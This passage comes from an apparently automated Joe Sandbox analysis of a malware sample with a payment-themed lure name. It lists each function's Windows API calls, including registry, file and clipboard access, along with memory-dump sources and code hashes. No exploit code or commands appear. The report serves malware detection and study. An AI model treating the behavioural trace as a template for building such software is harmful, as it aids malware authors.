                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: EnumNamesResource
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3334572018-0
                                                                                                                                                                                                                                          • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                                                                          • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                                                                                                                                          Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FreeLibrary.KERNELBASE(00000000), ref: 0044DEB6
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                                                                          • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                                                                          • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                                                                                                                                          Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseFind
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1863332320-0
                                                                                                                                                                                                                                          • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                                                                          • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                                                                                                                                          Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Open
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 71445658-0
                                                                                                                                                                                                                                          • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                                                                          • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                                                                                                                                          Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                                                          • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                                                                          • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                                                                                                                                          Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 4a5c685a9d9bdef1792c919a9c6653d350a9d3b47e85a52724e839495e208d01
                                                                                                                                                                                                                                          • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a5c685a9d9bdef1792c919a9c6653d350a9d3b47e85a52724e839495e208d01
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                                                                                                                                          Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004095FC
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                            • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                                                                                                                            • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                                                                            • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3655998216-0
                                                                                                                                                                                                                                          • Opcode ID: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                                                                                                                                                                                          • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                                                                                                                                          Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00445426
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                                            • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1828521557-0
                                                                                                                                                                                                                                          • Opcode ID: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                                                                                                                                                                                          • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                                                                                                                          Function 004068BF Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                                                                            • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??2@FilePointermemcpy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 609303285-0
                                                                                                                                                                                                                                          • Opcode ID: ff2b83ec1290d704cc9ef70c9b0cd29b753561e2494ca983cce7aef5439f8322
                                                                                                                                                                                                                                          • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff2b83ec1290d704cc9ef70c9b0cd29b753561e2494ca983cce7aef5439f8322
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                                                                                                                                                          Function 00406B90 Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _wcsicmp
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2081463915-0
                                                                                                                                                                                                                                          • Opcode ID: d19f359b0b47db267e5fce9c2c3eaec783a9e0147a5c7e9f99ecd470ce03f4be
                                                                                                                                                                                                                                          • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d19f359b0b47db267e5fce9c2c3eaec783a9e0147a5c7e9f99ecd470ce03f4be
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                                                                                                                                          Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                                                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2136311172-0
                                                                                                                                                                                                                                          • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                                                          • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                                                                                                                                          Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??2@??3@
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1936579350-0
                                                                                                                                                                                                                                          • Opcode ID: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                                                                                                                                                                                          • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                                                                                                                                                          Function 0040B633 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                          • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                                                                                                                          • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                                                                                                                                                          Function 0040AA04 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                          • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                                                                                                          • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                                                                                                                                                          Function 00415308 Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                          • Opcode ID: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                                                                                                                                                                                                          • Instruction ID: 5e082493cfe38c59748d9de5a46a99a47989c0e105afa31b953e1adb18ef7a34
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17900282455501105C0425755C06505110808A313A376074A7032955D1CE188060601D

                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                          Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                                                                                                                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040995D
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00409974
                                                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
